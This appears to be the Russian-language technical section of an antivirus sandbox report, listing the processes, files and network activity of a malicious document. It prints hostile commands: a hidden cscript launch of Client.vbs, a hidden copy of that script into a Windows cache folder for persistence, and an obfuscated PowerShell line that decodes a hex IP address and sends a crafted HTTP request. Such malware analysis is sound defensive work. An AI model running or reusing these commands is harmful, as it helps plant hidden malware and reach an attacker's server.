Техническая информация
- '%WINDIR%\syswow64\cscript.exe' %TEMP%\Client.vbs AC
- '%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\Client.vbs AC
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' {$px = 'c0','a8','38','1';$p = ($px | ForEach { [convert]::ToInt32($_,16) }) -join '.';$w = 'GET /index.html HTTP/1.1`r`nHost: $p`r`nMozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101...
- %TEMP%\client.vbs
- %LOCALAPPDATA%\microsoft\windows\caches\client.vbs
- %TEMP%\client.vbs
- DNS ASK kr###nfiles.com
- '%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\Client.vbs AC' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c cOpY "%TEMP%\Client.vbs" "%LOCALAPPDATA%\Microsoft\Windows\Caches" /Y' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' {$px = 'c0','a8','38','1';$p = ($px | ForEach { [convert]::ToInt32($_,16) }) -join '.';$w = 'GET /index.html HTTP/1.1`r`nHost: $p`r`nMozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '<SYSTEM32>\cmd.exe' /c cOpY "%TEMP%\Client.vbs" "%LOCALAPPDATA%\Microsoft\Windows\Caches" /Y